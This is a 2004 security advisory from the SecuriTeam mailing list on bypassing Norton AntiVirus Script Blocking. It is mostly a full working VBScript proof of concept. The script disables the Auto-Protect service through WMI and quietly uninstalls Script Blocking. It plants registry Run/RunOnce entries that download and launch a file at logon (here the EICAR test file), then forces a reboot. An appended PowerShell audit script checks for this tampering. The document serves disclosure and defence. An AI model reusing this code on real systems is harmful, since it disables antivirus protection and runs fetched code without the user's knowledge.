[NT] Norton Anti-Virus VB Scripting Vulnerability
From: SecuriTeam (support_at_securiteam.com)
Date: 11/17/04
To: list@securiteam.com Date: 17 Nov 2004 16:05:46 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Norton Anti-Virus VB Scripting Vulnerability
------------------------------------------------------------------------
SUMMARY
Presented here is a method to bypass Norton Anti-Virus Script Blocking and
launch malicious content undetected by the anti-virus.
DETAILS
The VBScript presented below runs even with Norton AntiVirus Script
Blocking enabled, because it does its work through WMI rather than the
scripting interfaces Script Blocking hooks. The script then disables the
Auto-Protect service and Script Blocking, allowing malicious content to run
undetected.
In a nutshell, here's what the proof of concept does (the Run/RunOnce
entries it writes take effect at the next logon, after the forced reboot):
1) Sets the NAV Auto-Protect Service to DISABLED
2) Adds a registry value that uninstalls Script Blocking
3) Creates and launches a VBScript file to download the EICAR AV 'test' virus
4) Launches the EICAR.COM test pattern a few seconds later
Note: This exploit works only if the user is logged in with Administrative
privileges.
A flash movie demonstrating the proof of concept can be found at:
http://wired.s6n.com/files/jathias/navdemo.html
You'll see that Script Blocking gets uninstalled. Also notice that
Auto-Protect doesn't kick in until you click on the tray icon and launch
the NAV console. By then, the 'virus' had already been running for quite
some time, as you can see in the cmd.exe window.
Proof of Concept Code:
The following code was tested under Windows XP and a fully LiveUpdated NAV
2005 over a broadband Internet connection. It should work on Windows 2000
and NAV 2004 as well.
' ----- DISABLE NORTON AUTO-PROTECT SERVICE WITH WMI -----
sServer = "."
Set oWMI = GetObject("winmgmts://.")
sServiceName = "Norton AntiVirus Auto-Protect Service"
sWQL = "Select state from Win32_Service " _
    & "Where displayname='" & sServiceName & "'"
Set oResults = oWMI.ExecQuery(sWQL)
For Each oService In oResults
    oService.StopService
    oService.ChangeStartMode("Disabled")
Next

' -------- UNINSTALL SCRIPT BLOCKING WITH WMI ;) ----------
' RunOnce values are executed once, at the next logon
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set objRegistry = _
    GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Uninstall Norton Script Blocking"
arrStringValues = ("MSIEXEC /x {D327AFC9-7BAA-473A-8319-6EB7A0D40138} /Q")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, _
    arrStringValues

' -------- CREATE VBS FILE TO GRAB THE EICAR AV-REFERENCE FILE ---------
Set objRegistry = _
    GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Create Code Downloader"
arrStringValues = ("cmd /c ECHO Set X=CreateObject("+chr(34)+"Microsoft.XMLHTTP"+chr(34)+"):X.open " _
    +chr(34)+"GET"+chr(34)+",("+chr(34)+"http://www.eicar.org/download/eicar.com"+chr(34)+"),False:X.send:set " _
    +"Y=createobject("+chr(34)+"adodb.stream"+chr(34)+"):Y.type=1:Y.open:Y.write " _
    +"X.responseBody:Y.savetofile("+chr(34)+"eicar.com"+chr(34)+"),2:Y.close > estart.VBS")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, _
    arrStringValues

' -------- CREATE VBS FILE THAT TRIGGERS CODE LAUNCH ----------
Set objRegistry = _
    GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Create Code Launcer"
arrStringValues = ("cmd /c ECHO wscript.sleep(10000):Set Z=CreateObject("+chr(34)+"WSCript.Shell"+chr(34) _
    +"):Z.run("+chr(34)+"cmd /k eicar.com"+chr(34)+") > elaunch.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, _
    arrStringValues

' -------- LAUNCH EICAR DOWNLOADER ----------
' Run values are executed at every logon
Set objRegistry = _
    GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Code DownLoader"
arrStringValues = ("estart.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, _
    arrStringValues

' -------- RUN THE 'VIRUS' ----------
Set objRegistry = _
    GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Malicious Code Launcher"
arrStringValues = ("elaunch.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, _
    arrStringValues

' ---- USE WMI TO FORCE A REBOOT -- NEXT LOGIN, PWN3D ----
Set wmi = GetObject("winmgmts:{(Shutdown)}")
set objset = wmi.instancesof("win32_operatingsystem")
for each obj in objset
    set os = obj : exit for
next
' Win32Shutdown flags: 2 = reboot, 4 = force (close applications without prompting)
os.win32shutdown 2 + 4
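As an added defender-side example (not part of the advisory or the PoC), the PowerShell audit below checks the two things the script above tampers with on a host: the state and start mode of the Auto-Protect service, and HKLM Run/RunOnce values that look like the ones it plants (a script file run at logon, a cmd redirect that writes a file, a quiet msiexec uninstall by product GUID). It assumes PowerShell 3 or later in an elevated session on Windows; the regex heuristics and function names are this example's own.

```powershell
# Added audit example, not part of the advisory. Assumes PowerShell 3+ (Get-CimInstance)
# in an elevated session; the service display name is the one the PoC queries.
$AvDisplayName = 'Norton AntiVirus Auto-Protect Service'
$RunKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'

# Heuristics (this example's own) for what the PoC writes into Run/RunOnce:
# a script file, a script host, a cmd redirect that writes a file, a quiet msiexec uninstall.
$SuspiciousPatterns = @(
    '\.(vbs|vbe|js|jse|wsf)\b',
    '\b[wc]script(\.exe)?\b',
    '^\s*"?cmd(\.exe)?"?\s+/[ck]\b.*>',
    'msiexec.*\s/x\s*\{[0-9A-F-]{36}\}.*\s/q'
)

function Get-SuspiciousAutorun {
    foreach ($key in $RunKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            # PSPath, PSParentPath, PSChildName, PSDrive, PSProvider are provider
            # metadata added by Get-ItemProperty, not registry values.
            if ($p.Name -like 'PS*') { continue }
            $cmd = [string]$p.Value
            $hits = @($SuspiciousPatterns | Where-Object { $cmd -match $_ })
            if ($hits.Count -gt 0) {
                [pscustomobject]@{
                    Key = $key; Name = $p.Name; Command = $cmd; Matched = ($hits -join ' | ')
                }
            }
        }
    }
}

function Test-AvService {
    # The PoC stops this service and sets its StartMode to Disabled through Win32_Service.
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "DisplayName='$AvDisplayName'" |
        Select-Object -First 1
    if (-not $svc) { return "MISSING: service '$AvDisplayName' is not installed" }
    if ($svc.State -ne 'Running' -or $svc.StartMode -eq 'Disabled') {
        return "TAMPERED: $($svc.Name) State=$($svc.State) StartMode=$($svc.StartMode)"
    }
    "OK: $($svc.Name) State=$($svc.State) StartMode=$($svc.StartMode)"
}

Test-AvService
$findings = @(Get-SuspiciousAutorun)
if ($findings.Count -eq 0) { 'OK: no suspicious HKLM Run/RunOnce values' }
else { $findings | Format-Table -AutoSize -Wrap }
```

Run it from a scheduled task or a logon script so a Disabled start mode or a freshly planted RunOnce value is reported before the next reboot rather than discovered from the tray icon.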
ADDITIONAL INFORMATION
The information has been provided by Daniel Milisic <dmilisic@myrealbox.com>.